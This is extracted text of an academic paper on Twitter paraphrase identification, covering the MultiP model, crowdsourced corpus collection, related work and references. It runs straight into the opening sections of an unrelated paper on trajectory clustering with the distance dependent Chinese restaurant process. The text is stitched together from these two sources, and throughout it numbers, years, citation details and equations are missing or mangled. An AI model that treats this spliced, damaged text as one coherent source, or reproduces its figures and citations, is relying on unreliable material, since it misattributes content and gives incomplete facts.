[Table: Feature ablation, reporting F1, precision and recall for the full MultiP model and for the model with the string, POS, or topical feature group removed; the numeric scores are not recoverable in this copy.]

[Table: Example system outputs. "Rank" is the position in the list of all candidate paraphrase pairs in the test set ordered by model score; MultiP discovers lexically divergent paraphrases while LexLatent prefers more overall sentence similarity, and underlining marks the word pair(s) with the highest estimated probability of being paraphrastic anchor(s) for each sentence pair. Paraphrase examples include "the new ciroc flavor has arrived / ciroc got a new flavor comin out", "roberto mancini gets the boot from man city / roberto mancini has been sacked by manchester city with the blues saying", and "i want to watch the purge tonight / i want to go see the purge who wants to come with"; non-paraphrase examples include "somebody took the marlins to innings / anyone who stayed innings for the marlins" and "world of jenks is on at / world of jenks is my favorite show on tv".]

[Figure: Precision and recall curves. Our MultiP model alone achieves competitive performance with the LexLatent system, which combines a latent space model and a feature-based supervised classifier. The two approaches have complementary strengths and achieve a significant improvement when combined (MultiP-PE).]
Both string and POS features are essential for system performance, while topical features are helpful but not as crucial.

The precision-recall figure shows the sensitivity and specificity of each model in comparison. In the first, lower-recall half of the curve, the MultiP model makes bolder and less accurate decisions than LexLatent. However, the curve for the MultiP model is flatter and shows consistently better precision in the higher-recall half, as well as a higher maximum F1 score. This result reflects the design concept of MultiP, which is intended to pick up sentential paraphrases with more divergent wordings aggressively. LexLatent, as a combined system, considers sentence features in both surface and latent space and is more conservative. The example-output table further illustrates this difference with some example system outputs.

Product of Experts (MultiP-PE)

Our MultiP model and previous similarity-based approaches have complementary strengths, so we experiment with combining MultiP ($P_M$) and LexLatent ($P_L$) through a product of experts (Hinton):

$$p(y \mid s_1, s_2) = \frac{P_M(y \mid s_1, s_2) \times P_L(y \mid s_1, s_2)}{\sum_{y} P_M(y \mid s_1, s_2) \times P_L(y \mid s_1, s_2)}$$

The resulting system, MultiP-PE, provides consistently better precision and recall than the LexLatent model, as shown on the right side of the precision-recall figure, and it outperforms LexLatent significantly according to a paired t-test. Our proposed MultiP takes advantage of Twitter's specific properties and provides information complementary to previous approaches. Previously, Das and Smith also used a product of experts to combine a lexical and a syntax-based model.

Constructing the Twitter Paraphrase Corpus

We now turn to describing our data collection and annotation methodology. Our goal is to construct a high-quality dataset that contains representative examples of paraphrases and non-paraphrases on Twitter. Since Twitter users are free to talk about anything regarding any topic, a random pair of sentences about the same topic has a low chance of expressing the same meaning. This causes two problems: (a) it is expensive to obtain paraphrases via manual annotation; and (b) non-expert annotators tend to loosen the criteria and are more likely to make false positive errors. To address these challenges, we design a simple annotation task and introduce two selection mechanisms to select sentences that are more likely to be paraphrases, while preserving diversity and representativeness.

Raw Data from Twitter

We crawl Twitter's trending topics and their associated tweets using the public APIs (more information about Twitter's APIs: https://dev.twitter.com/docs/api/ . /overview). According to Twitter, trends are determined by an algorithm which identifies topics that are immediately popular, rather than those that have been popular for longer periods of time or which trend on a daily basis.
We tokenize and split each tweet into sentences using the toolkit developed by O'Connor et al. (TweetMotif: https://github.com/brendano/tweetmotif).

Task Design on Mechanical Turk

We show the annotator an original sentence, then ask them to pick the sentences with the same meaning from a set of candidate sentences. The original and candidate sentences are randomly sampled from the same topic. For each such one-versus-many question, we obtain binary judgements from several different annotators, paying each annotator a small fixed amount per question. On average, each question takes one annotator a matter of seconds to answer.

Annotation Quality

We remove problematic annotators by checking their Cohen's kappa agreement with the other annotators (Artstein and Poesio). We also compute inter-annotator agreement with an expert annotator on a sample of sentence pairs. In the expert annotation, we adopt a Likert scale to measure the degree of semantic similarity between sentences, which is defined by Agirre et al. as follows:
- completely equivalent, as they mean the same thing;
- mostly equivalent, but some unimportant details differ;
- roughly equivalent, but some important information differs or is missing;
- not equivalent, but share some details;
- not equivalent, but are on the same topic;
- on different topics.
Although the two scales of expert and crowdsourced annotation are defined differently, their Pearson correlation coefficient is high (two-tailed significance test). The heat-map figure shows the detailed overlap between the two annotations. It suggests that the graded similarity annotation task can be reduced to a binary choice in a crowdsourcing setup.

[Figure: A heat-map showing the overlap between expert and crowdsourced annotation. The intensity along the diagonal indicates good reliability of crowdsourcing workers for this particular task, and the shift above the diagonal reflects the difference between the two annotation schemes. For crowdsourcing (Turk), the numbers indicate how many annotators picked the sentence pair as a paraphrase; pairs with few positive votes are treated as non-paraphrases and pairs with most positive votes as paraphrases. For the expert annotation, the lower similarity scores are treated as non-paraphrases and the higher scores as paraphrases. Medium-scored cases are discarded in training and testing in our experiments.]

[Figure: The proportion of paraphrases (percentage of positive votes from annotators) varies greatly across trending topics (examples include Reggie Miller, Robert Woods, The Clippers, Jeff Green, Klay, Dortmund, Ronaldo, Netflix, Dwight Howard, Facebook and U.S.), comparing filtered and random sampling; automatic filtering roughly doubles the paraphrase yield.]

Automatic Summarization Inspired Sentence Filtering

We filter the sentences within each topic to select more probable paraphrases for annotation. Our method is inspired by a typical problem in extractive summarization: the salient sentences are likely to be redundant (paraphrases) and need to be removed in the output summaries. We employ the scoring method used in SumBasic (Nenkova and Vanderwende; Vanderwende et al.), a simple but powerful summarization system, to find salient sentences. For each topic, we compute the probability of each word $p(w_i)$ by simply dividing its frequency by the total number of words in all sentences. Each sentence $s$ is scored as the average of the probabilities of the words in it, i.e.,

$$\mathrm{salience}(s) = \frac{\sum_{w_i \in s} p(w_i)}{|\{w_i \mid w_i \in s\}|}$$

We then rank the sentences, pick the original sentence randomly from the most salient sentences, and pick the candidate sentences from a larger top-ranked pool to present to the annotators. In a trial experiment over several topics, the filtering technique roughly doubled the yield of paraphrases over naive random sampling (see the topic and yield figures).
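The sketch below implements this SumBasic-style salience scoring and the two-pool sampling of an annotation question. The exact percentage cutoffs and the number of candidate sentences per question are not recoverable from this copy, so the defaults orig_frac, cand_frac and n_candidates are illustrative assumptions; sentences are assumed to be non-empty lists of tokens.

from collections import Counter
import random

def salience_scores(sentences):
    """Score each tokenized sentence by the average unigram probability of its words."""
    word_counts = Counter(w for s in sentences for w in s)
    total = sum(word_counts.values())
    p = {w: c / total for w, c in word_counts.items()}
    return [sum(p[w] for w in set(s)) / max(1, len(set(s))) for s in sentences]

def sample_annotation_question(sentences, n_candidates=10,
                               orig_frac=0.1, cand_frac=0.5, seed=0):
    """Pick one original sentence from the most salient fraction of a topic and
    candidate sentences from a larger salient fraction of the same topic."""
    rng = random.Random(seed)
    scores = salience_scores(sentences)
    ranked = [s for _, s in sorted(zip(scores, sentences), key=lambda x: -x[0])]
    top_orig = ranked[: max(1, int(len(ranked) * orig_frac))]
    top_cand = ranked[: max(1, int(len(ranked) * cand_frac))]
    original = rng.choice(top_orig)
    pool = [s for s in top_cand if s != original]
    candidates = rng.sample(pool, min(n_candidates, len(pool)))
    return original, candidates

Each sampled (original, candidates) pair corresponds to one crowdsourcing question of the kind described in the task design above.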
We also use PINC (Chen and Dolan) to measure the quality of the collected paraphrases. PINC was designed to measure n-gram dissimilarity between two sentences, and in essence it is the inverse of BLEU. In general, the cases with high PINC scores include more complex and interesting rephrasings.

[Figure: Numbers of paraphrases collected by different methods (random sampling, sentence filtering, and MAB-based topic selection), plotted against the number of annotators judging a pair as a paraphrase. The annotation efficiency is significantly improved by the sentence filtering and the multi-armed bandits (MAB) based topic selection.]

[Figure: PINC (lexical dissimilarity) scores of the paraphrases collected under random sampling, sentence filtering, and MAB-based topic selection. The higher the PINC, the more significant the rewording. Our proposed annotation strategy quadruples the paraphrase yield while not greatly reducing diversity as measured by PINC.]

Topic Selection Using a Multi-Armed Bandits (MAB) Algorithm

Another approach to increasing the paraphrase yield is to choose more appropriate topics. This is particularly important because the number of paraphrases varies greatly from topic to topic, and so does the chance of encountering paraphrases during annotation (see the topic figure). We treat this topic selection problem as a variation of the multi-armed bandit (MAB) problem (Robbins) and adapt a greedy algorithm, the bounded $\epsilon$-first algorithm of Tran-Thanh et al., to accelerate our corpus construction.

Our strategy consists of two phases. In the first, exploration phase, we dedicate a fraction $\epsilon$ of the total annotation budget $B$ to explore randomly chosen arms of each slot machine (a trending topic on Twitter), each $m$ times. In the second, exploitation phase, we sort all topics according to their estimated proportion of paraphrases and sequentially annotate the $\lceil (1-\epsilon)B / (L-m) \rceil$ arms that have the highest estimated reward, until reaching the maximum of $L$ annotations for any topic to ensure data diversity. We tune the parameter $m$ and the value of $\epsilon$ through simulation experiments, by artificially duplicating a small amount of real annotation data. We then apply this MAB algorithm in the real world: we explore randomly chosen topics and then exploit the most promising of them. The yield of paraphrases rises substantially when MAB is combined with sentence filtering, a roughly four-fold increase compared with using random selection alone (see the yield figure).

Related Work

Automatic paraphrase identification has been widely studied (Androutsopoulos and Malakasiotis; Madnani and Dorr). The ACL wiki gives an excellent summary of various techniques (http://aclweb.org/aclwiki/index.php?title=paraphrase_identification_(state_of_the_art)). Many recent high-performance approaches use system combination (Das and Smith; Madnani et al.; Ji and Eisenstein); for example, Madnani et al. combine multiple sophisticated machine translation metrics using a meta-classifier. An earlier attempt on Twitter data is that of Xu et al. They limited the search space to only those tweets that explicitly mention the same date and the same named entity; however, a considerable number of mislabels remain in their data. Zanzotto et al. also experimented with SVM tree kernel methods on Twitter data.

Departing from the previous work, we propose a latent variable model to jointly infer the correspondence between words and sentences. It is related to discriminative monolingual word alignment (MacCartney et al.; Thadani and McKeown,
The data is released by Xu et al.
( b) at: https:// github.com/cocoxu/twitterparaphrase/ ; yao et al., a,b), but different in that the paraphrase task requires additional sentence align- ment modeling with no word alignment data. our approach is also inspired by fung and cheung’s ( a; b) work on bootstrapping bilingual par- allel sentence and word translations from compara- ble corpora. multiple instance learning (dietterich et al., ) has been used by different research groups in the field of information extraction (riedel et al., ; hoffmann et al., ; surdeanu et al., ; ritter et al., ; xu et al., a). the idea is to leverage structured data as weak supervision for tasks such as relation extraction. this is done, for example, by making the assumption that at least one sentence in the corpus which mentions a pair of en- tities (e ,e ) participating in a relation (r) expresses the proposition: r(e ,e ). crowdsourcing paraphrase acquisition: buzek et al. ( ) and denkowski et al. ( ) focused specifically on collecting paraphrases of text to be translated to improve machine translation quality. chen and dolan ( ) gathered a large-scale para- phrase corpus by asking mechanical turk workers to caption the action in short video segments. sim- ilarly, burrows et al. ( ) asked crowdsourcing workers to rewrite selected excerpts from books. ling et al. ( ) crowdsourced bilingual parallel text using twitter as the source of data. in contrast, we design a simple crowdsourcing task requiring only binary judgements on sentences collected from twitter. there are several advantages as compared to existing work: a) the corpus also covers a very diverse range of topics and linguistic expressions, especially colloquial language, which is different from and thus complements previous paraphrase corpora; b) the paraphrase corpus col- lected contains a representative proportion of both negative and positive instances, while lack of good negative examples was an issue in the previous re- search (das and smith, ); c) this method is scal- able and sustainable due to the simplicity of the task and real-time, virtually unlimited text supply from twitter. conclusions this paper introduced multip, a joint word- sentence model to learn paraphrases from tempo- rally and topically grouped messages in twitter. while simple and principled, our model achieves performance competitive with a state-of-the-art en- semble system combining latent semantic represen- tations and surface similarity. by combining our method with previous work as a product-of-experts we outperform the state-of-the-art. our latent- variable approach is capable of learning word-level paraphrase anchors given only sentence annotations. because our graphical model is modular and ex- tensible (for example it should be possible to re- place the deterministic-or with other aggregators), we are optimistic this work might provide a path towards weakly supervised word alignment models using only sentence-level annotations. in addition, we presented a novel and efficient annotation methodology which was used to crowd- source a unique corpus of paraphrases harvested from twitter. we make this resource available to the research community. acknowledgments the author would like to thank editor sharon gold- water and three anonymous reviewers for their thoughtful comments, which substantially improved this paper. we also thank ralph grishman, sameer singh, yoav artzi, mark yatskar, chris quirk, ani nenkova and mitch marcus for their feedback. 
this material is based in part on research spon- sored by the nsf under grant iis- , darpa under agreement number fa - - - (the deft program) and through a google faculty re- search award to chris callison-burch. the u.s. government is authorized to reproduce and dis- tribute reprints for governmental purposes. the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of darpa or the u.s. government. yangfeng ji is supported by a google faculty research award awarded to jacob eisenstein. references agirre, e., diab, m., cer, d., and gonzalez-agirre, a. ( ). semeval- task : a pilot on se- mantic textual similarity. in proceedings of the first joint conference on lexical and computa- tional semantics (*sem). androutsopoulos, i. and malakasiotis, p. ( ). a survey of paraphrasing and textual entailment methods. journal of artificial intelligence re- search, . artstein, r. and poesio, m. ( ). inter-coder agreement for computational linguistics. compu- tational linguistics, ( ). bhagat, r. and hovy, e. ( ). what is a para- phrase? computational linguistics, ( ). burrows, s., potthast, m., and stein, b. ( ). paraphrase acquisition via crowdsourcing and machine learning. transactions on intelligent systems and technology (acm tist). buzek, o., resnik, p., and bederson, b. b. ( ). error driven paraphrase annotation using me- chanical turk. in proceedings of the workshop on creating speech and language data with ama- zon’s mechanical turk. chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). collins, m. ( ). discriminative training methods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceed- ings of the conference on empirical methods on natural language processing (emnlp). das, d. and smith, n. a. ( ). paraphrase identi- fication as probabilistic quasi-synchronous recog- nition. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th inter- national joint conference on natural language processing of the asian federation of natural language processing (acl-ijcnlp). denkowski, m., al-haj, h., and lavie, a. ( ). turker-assisted paraphrasing for english-arabic machine translation. in proceedings of the work- shop on creating speech and language data with amazon’s mechanical turk. derczynski, l., ritter, a., clark, s., and bontcheva, k. ( ). twitter part-of-speech tagging for all: overcoming sparse and noisy data. in proceed- ings of the recent advances in natural language processing (ranlp). diao, q., jiang, j., zhu, f., and lim, e.-p. ( ). finding bursty topics from microblogs. in pro- ceedings of the th annual meeting of the asso- ciation for computational linguistics (acl). dietterich, t. g., lathrop, r. h., and lozano-pérez, t. ( ). solving the multiple instance prob- lem with axis-parallel rectangles. artificial intel- ligence, ( ). dolan, b., quirk, c., and brockett, c. ( ). un- supervised construction of large paraphrase cor- pora: exploiting massively parallel news sources. in proceedings of the th international confer- ence on computational linguistics (coling). dolan, w. and brockett, c. ( ). automatically constructing a corpus of sentential paraphrases. in proceedings of the rd international workshop on paraphrasing. dunning, t. ( ). 
accurate methods for the statis- tics of surprise and coincidence. computational linguistics, ( ). fellbaum, c. ( ). wordnet. in theory and ap- plications of ontology: computer applications. springer. francis, w. n. and kucera, h. ( ). brown corpus manual. brown university. fung, p. and cheung, p. ( a). mining very-non- parallel corpora: parallel sentence and lexicon ex- traction via bootstrapping and em. in proceed- ings of the conference on empirical methods in natural language processing (emnlp). fung, p. and cheung, p. ( b). multi-level boot- strapping for extracting parallel sentences from a quasi-comparable corpus. in proceedings of the international conference on computational lin- guistics (coling). guo, w. and diab, m. ( ). modeling sentences in the latent space. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). guo, w., li, h., ji, h., and diab, m. ( ). link- ing tweets to news: a framework to enrich short text data in social media. in proceedings of the th annual meeting of the association for com- putational linguistics (acl). han, b., cook, p., and baldwin, t. ( ). auto- matically constructing a normalisation dictionary for microblogs. in proceedings of the confer- ence on empirical methods on natural language processing and computational natural language learning (emnlp-conll). hinton, g. e. ( ). training products of experts by minimizing contrastive divergence. neural computation, ( ). hoffmann, r., zhang, c., ling, x., zettlemoyer, l. s., and weld, d. s. ( ). knowledge-based weak supervision for information extraction of overlapping relations. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). hovy, e., marcus, m., palmer, m., ramshaw, l., and weischedel, r. ( ). ontonotes: the % solution. in proceedings of the human language technology conference - north american chap- ter of the association for computational linguis- tics annual meeting (hlt-naacl). ji, y. and eisenstein, j. ( ). discriminative improvements to distributional sentence similar- ity. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). liang, p., bouchard-côté, a., klein, d., and taskar, b. ( ). an end-to-end discriminative approach to machine translation. in proceedings of the st international conference on computational lin- guistics and the th annual meeting of the asso- ciation for computational linguistics (coling- acl). ling, w., marujo, l., dyer, c., alan, b., and isabel, t. ( ). crowdsourcing high-quality parallel data extraction from twitter. in proceedings of the ninth workshop on statistical machine trans- lation (wmt). maccartney, b., galley, m., and manning, c. ( ). a phrase-based alignment model for natural language inference. in proceedings of the conference on empirical methods in natural language processing (emnlp). madnani, n. and dorr, b. j. ( ). generating phrasal and sentential paraphrases: a survey of data-driven methods. computational linguistics, ( ). madnani, n., tetreault, j., and chodorow, m. ( ). re-examining machine translation met- rics for paraphrase identification. in proceedings of the conference of the north american chapter of the association for computational linguistics - human language technologies (naacl-hlt). minnen, g., carroll, j., and pearce, d. ( ). ap- plied morphological processing of english. natu- ral language engineering, ( ). moore, r. c. ( ). on log-likelihood-ratios and the significance of rare events. 
in proceedings of the conference on empirical methods in natural language processing (emnlp). nenkova, a. and vanderwende, l. ( ). the im- pact of frequency on summarization. technical report, microsoft research. msr-tr- - . o’connor, b., krieger, m., and ahn, d. ( ). tweetmotif: exploratory search and topic sum- marization for twitter. in proceedings of the th international aaai conference on weblogs and social media (icwsm). petrović, s., osborne, m., and lavrenko, v. ( ). using paraphrases for improving first story detec- tion in news and twitter. in proceedings of the conference of the north american chapter of the association for computational linguistics - hu- man language technologies (naacl-hlt). riedel, s., yao, l., and mccallum, a. ( ). mod- eling relations and their mentions without labeled text. in proceedigns of the european conference on machine learning and principles and practice of knowledge discovery in databases (ecml- pkdd). ritter, a., mausam, etzioni, o., and clark, s. ( ). open domain event extraction from twit- ter. in proceedings of the th international con- ference on knowledge discovery and data min- ing (sigkdd). ritter, a., zettlemoyer, l., mausam, and etzioni, o. ( ). modeling missing data in distant super- vision for information extraction. transactions of the association for computational linguistics (tacl). robbins, h. ( ). some aspects of the sequen- tial design of experiments. in herbert robbins selected papers. springer. sekine, s. ( ). automatic paraphrase discovery based on context and keywords between ne pairs. in proceedings of the rd international workshop on paraphrasing. shinyama, y., sekine, s., and sudo, k. ( ). au- tomatic paraphrase acquisition from news articles. in proceedings of the nd international confer- ence on human language technology research (hlt). surdeanu, m., tibshirani, j., nallapati, r., and man- ning, c. d. ( ). multi-instance multi-label learning for relation extraction. in proceedings of the th annual meeting of the association for computational linguistics (acl). thadani, k. and mckeown, k. ( ). optimal and syntactically-informed decoding for monolingual phrase-based alignment. in proceedings of the th annual meeting of the association for com- putational linguistics - human language tech- nologies (acl-hlt). tran-thanh, l., stein, s., rogers, a., and jennings, n. r. ( ). efficient crowdsourcing of un- known experts using multi-armed bandits. in pro- ceedings of the european conference on artificial intelligence (ecai). vanderwende, l., suzuki, h., brockett, c., and nenkova, a. ( ). beyond sumbasic: task- focused summarization with sentence simplifica- tion and lexical expansion. information process- ing & management, . wan, s., dras, m., dale, r., and paris, c. ( ). using dependency-based features to take the “para-farce” out of paraphrase. in proceedings of the australasian language technology work- shop. wang, l., dyer, c., black, a. w., and trancoso, i. ( ). paraphrasing microblog normaliza- tion. in proceedings of the conference on em- pirical methods on natural language processing (emnlp). winkler, w. e. ( ). the state of record link- age and current research problems. technical re- port, statistical research division, u.s. census bureau. xu, w., hoffmann, r., zhao, l., and grishman, r. ( a). filling knowledge base gaps for distant supervision of relation extraction. in proceedings of the st annual meeting of the association for computational linguistics (acl). xu, w., ritter, a., and grishman, r. ( b). 
gath- ering and generating paraphrases from twitter with application to normalization. in proceed- ings of the sixth workshop on building and using comparable corpora (bucc). yao, x., van durme, b., callison-burch, c., and clark, p. ( a). a lightweight and high perfor- mance monolingual word aligner. in proceedings of the th annual meeting of the association for computational linguistics (acl). yao, x., van durme, b., and clark, p. ( b). semi-markov phrase-based monolingual align- ment. in proceedings of the conference on em- pirical methods on natural language processing (emnlp). zanzotto, f. m., pennacchiotti, m., and tsiout- siouliklis, k. ( ). linguistic redundancy in twitter. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). zettlemoyer, l. s. and collins, m. ( ). on- line learning of relaxed ccg grammars for pars- ing to logical form. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational nat- ural language learning (emnlp-conll). zhang, c. and weld, d. s. ( ). harvesting paral- lel news streams to generate paraphrases of event relations. in proceedings of the conference on empirical methods in natural language process- ing (emnlp). submitted may accepted june published august corresponding authors reza arfa, rezaarfa@gmail.com rubiyah yusof, rubiyah.kl@utm.my academic editor pablo arbelaez additional information and declarations can be found on page doi . /peerj-cs. copyright arfa et al. distributed under creative commons cc-by . open access novel trajectory clustering method based on distance dependent chinese restaurant process reza arfa , , rubiyah yusof , and parvaneh shabanzadeh , centre for artificial intelligence and robotics, universiti teknologi malaysia, kuala lumpur, malaysia centre for artificial intelligence and robotics, malaysia-japan international institute of technology (mjiit), universiti teknologi malaysia, kuala lumpur, malaysia abstract trajectory clustering and path modelling are two core tasks in intelligent transport systems with a wide range of applications, from modeling drivers’ behavior to traffic monitoring of road intersections. traditional trajectory analysis considers them as separate tasks, where the system first clusters the trajectories into a known number of clusters and then the path taken in each cluster is modelled. however, such a hierarchy does not allow the knowledge of the path model to be used to improve the performance of trajectory clustering. based on the distance dependent chinese restaurant process (ddcrp), a trajectory analysis system that simultaneously performs trajectory clustering and path modelling was proposed. unlike most traditional approaches where the number of clusters should be known, the proposed method decides the number of clusters automatically. the proposed algorithm was tested on two publicly available trajectory datasets, and the experimental results recorded better performance and considerable improvement in both datasets for the task of trajectory clustering compared to traditional approaches. the study proved that the proposed method is an appropriate candidate to be used for trajectory clustering and path modelling. 
subjects artificial intelligence, computer vision, visual analytics keywords path modelling, trajectory clustering, anomaly detection, chinese restaurant process, distance dependent crp introduction the trajectory of a moving object obtained by tracking the object’s position from one frame to the next is a simple yet efficient descriptor of an object’s motion. trajectory analysis has long been a research focus in different fields of study (jonsen, myers & flemming, ; pao et al., ; reed et al., ; fox, sudderth & willsky, ). in the context of intelligent surveillance systems (its) (tian et al., ), trajectory clustering is a critical core technology in many surveillance applications including activity analysis (morris & trivedi, ), path modelling (zhang, lu & li, ), anomaly detection (dee & velastin, ), and road intersection traffic monitoring (aköz & karsligil, ). many trajectory analysis systems consist of two main steps. in the first step, trajectories are grouped into clusters based on their similarities. most proposed methods assume the number of clusters to be known. after the trajectories are clustered, the path taken by agents how to cite this article arfa r, yusof r, shabanzadeh p. . novel trajectory clustering method based on distance dependent chinese restaurant process. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:rezaarfa@gmail.com mailto:rubiyah.kl@utm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. in each cluster will be modelled. there are at least two limitations with these approaches. first, in real-world problems, the number of clusters is usually unknown or is expensive to acquire. furthermore, trajectory clusters and path models are closely related, whereby the knowledge of one helps in improving the performance of the other. most existing trajectory analysis methods can be categorized into similarity-based models and probabilistic topic models (ptm). the main stages of similarity-based approaches are calculating a similarity matrix and clustering the trajectories based on the similarity matrix. at the first stage, pairwise similarities between trajectories are obtained via a similarity function and stored into a n ×n matrix, where n is the total number of available trajectories. defining a suitable similarity measure is a challenging task that directly affects the overall accuracy of the system (zhang, kaiqi & tieniu, ). well-known similarity measures used for trajectory analysis include euclidean distance, dynamic time wrapping (dtw) (keogh & pazzani, ), hausdorff distance (atev, miller & papanikolopoulos, ), and longest common sub-sequences (lcss) (vlachos, kollios & gunopulos, ). after the similarity matrix is obtained, the second stage uses any standard clustering algorithm to cluster the trajectories into k clusters based on their similarities. typical clustering algorithms include spectral clustering (ng, jordan & weiss, ), agglomerative clustering (xi, weiming & wei, ), and fuzzy c-means (weiming et al., ). the main disadvantage of similarity-based approaches is that it requires the number of clusters, k , to be known in advance. when trajectories are clustered, some studies perform path modelling in a further stage. 
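As a concrete illustration of the similarity-based pipeline summarized above, the following sketch computes a pairwise trajectory distance matrix with a simple symmetric Hausdorff-style measure and feeds it to average-linkage agglomerative clustering. It is a generic sketch rather than the implementation of any of the cited systems; the choice of distance, the linkage method, and the requirement to supply the number of clusters k are all illustrative assumptions.

import numpy as np
from scipy.cluster.hierarchy import linkage, fcluster
from scipy.spatial.distance import squareform

def hausdorff(a, b):
    """Symmetric Hausdorff-style distance between trajectories a (n, 2) and b (m, 2)."""
    d = np.linalg.norm(a[:, None, :] - b[None, :, :], axis=-1)  # (n, m) point distances
    return max(d.min(axis=1).max(), d.min(axis=0).max())        # max of the two directed distances

def cluster_trajectories(trajectories, k):
    """Cluster raw trajectories into k groups from a precomputed distance matrix."""
    n = len(trajectories)
    dist = np.zeros((n, n))
    for i in range(n):
        for j in range(i + 1, n):
            dist[i, j] = dist[j, i] = hausdorff(trajectories[i], trajectories[j])
    # average-linkage agglomerative clustering on the condensed distance matrix
    labels = fcluster(linkage(squareform(dist), method="average"),
                      t=k, criterion="maxclust")
    return labels

The need to fix k in advance in this pipeline is exactly the limitation that motivates the ddCRP-based model developed in the following sections.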
path models are useful in intelligent surveillance systems and used for compact representation of clusters, performing real-time anomaly detection (morris & trivedi, ), and high-level scene understanding (lei et al., ), and route planning (joseph et al., ). makris & ellis ( ) modelled the path as an envelope, which denotes the extent of a path by finding the two farthest samples in a cluster. morris & trivedi ( ) used the weighted average of trajectories of each cluster to form the path model for that cluster. based on the dominant set clustering approach, yiwen et al. ( ) proposed a system that obtains the scene structure from clustered trajectories. all these approaches, however, model the path after the trajectories are clustered. therefore, the performance of the modelled path is limited to how well trajectories are clustered. also, the modelled path is not used to improve the trajectory clustering. another well-known class of approaches in trajectory analysis is based on probabilistic topic model (ptm) (papadopoulos, ). in ptm approaches, trajectories are first converted into a set of symbols via a pre-defined codebook. this new representation of trajectories is then treated as documents while the symbols are treated as words. compared to a similarity-based approach, trajectory analysis methods based on ptm do not usually require the number of clusters in advance. jeong, chang & choi ( ) used latent dirichlet allocation (lda) and the hidden markov model (hmm) to discover the semantic regions and the temporal relationship between them. a two-level lda topic model is proposed by song et al. (lei et al., ). the first level lda models the motion of single-agent as distributions over patch-based arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. features. the second level lda uses the output of the first-level to learn interactions over multi-agents. this model, however, does not perform trajectory clustering. wang et al. ( ) proposed a dual hierarchical dirichlet process (dual-hdp). unlike previous ptm models, dual-hdp is capable of clustering the trajectories and modelling the semantic scene at the same time. each semantic region is modelled as a distribution over grids, and the scene is modelled as a distribution over the semantic regions. the number of clusters and the semantic scene is decided automatically. since the model relies only on bag-of-grids representation, it cannot capture the long-term dependency between observations. this results in having a partial path model for each cluster. having a full path model is an important step for interpreting agents’ movement in scenarios such as highways and junctions. furthermore, since only quantised trajectories are used, the overall performance of dual-hdp is highly sensitive to grid size. choosing a large grid size rapidly decreases the performance due to quantisation error. on the other hand, choosing a small grid size requires considerably more amount of data to learn the trajectory patterns. this study proposed a trajectory clustering and path modelling system that clusters the trajectories and models the path taken by each cluster at the same time. our approach is based on distant dependent chinese restaurant process (ddcrp) (blei & frazier, ), which is a generalisation of the normal chinese restaurant process (crp) (pitman, ). 
methods distance dependence chinese restaurant process the chinese restaurant process (crp) is a distribution on partitions of integers proposed by pitman ( ). crp can be explained by the following analogy: imagine a chinese restaurant with an infinite number of tables. the first customer enters the restaurant and sits at the first table with probability . next, customers enter the restaurant and sit at occupied tables with probability proportional to the number of customers sitting on that table or sit at an empty table with the probability relative to a parameter α. after this process, which is known as a customer-table assignment, customers sitting on the same table will share a similar dish. this process can be described as follows: p(zi=k|z−i,α)∝ { nk,k≤k α,k=k + ( ) where zi denotes table assignment for the ith customer, k is the total number of occupied tables, and z−i is table assignmthe ent of all other customers except ith customer, and nk is the total number of customers sitting on the ith table. more details of crp and its connection to dirichlet process can be found in gershman & blei ( ). the distance dependence chinese restaurant process (ddcrp) generalises the crp and allows for a non-exchangeable distribution over partitions (blei & frazier, ). unlike crp, where each customer is assigned to a table, in ddcrp each customer is assigned to another customer with a probability relative to their distance/similarity. therefore, the more similar two customers, the more probable they will get a direct link. it is important to arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that it is still possible for two customers with small similarities to be indirectly linked to each other via intermediate customers. after this procedure, which is also known as a customer to customer assignment, customers who are directly or indirectly linked will sit down at a table and share a similar dish. more formally, let dij represent the distance between ith and jth customers. probability of customer i have a direct link with customer j is calculated as: p ( ci= j|d,f ,τ ) ∝ { τ, if i= j f (dij), otherwise ( ) where f (d) denotes a monolithically decreasing decaying function that satisfies f (∞)= , d is the matrix of pairwise distance between customers, and τ is a constant that indicates the probability of self-link. the ddcrp was proposed originally for modelling non-exchangeable text documents where the distance between the dates of documents determines their similarity. the documents are converted into their bag-of-words (bow) representation before the posterior probability of ddcrp is calculated. such a conversion to bow representation is a crucial step that makes the inference of ddcrp computationally tractable. recently researchers have adopted ddcrp for problems beyond language processing. ghosh et al. ( ) proposed a hierarchical extension of ddcrp for producing coarser image segmentations in the form of human-like segmentations. in a more recent study, baldassano, beck & li ( ) used ddcrp to model a complex web of connections with a small number of interacting units. the proposed method is used to model the connectivity between sub-regions of the human brain and analysing human migration behaviour. also, ren et al. ( ) used ddcrp for key frame selection from unordered image sets, where the selected frames are used for dense d reconstruction. 
trajectory analysis with distance dependent crp unlike text data where observations in documents are words sampled from a corpus with a limited number of words, observations in trajectories are not discrete. trajectories are vectors with varying length where each observation gets a real value bounded by the scene’s size. one can divide the scene into blocks of equal sizes and convert a trajectory into its discrete form. after such a conversion, the resulting quantized trajectories are equal length vectors and each observation gets a discrete value. the size of grids in this case, however, will have a direct impact on the system performance. while theoretically smaller grids can improve the performance, they require substantially more data for training. another disadvantage of treating trajectories as documents is the bag-of-words representation. such representation discards the order between observations. discarding the orders between samples in trajectory data is problematic since it is possible for agents from opposite directions to share the same observations over grids. one solution to avoid this problem is to quantise the direction of observations (wang et al., ). estimating the direction of observation requires further processing and sometimes includes an inaccurate estimation. such a quantisation increases the size of the corpus and, therefore, requires more data for training. in addition, with bag-of-word representation alone long-term arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ 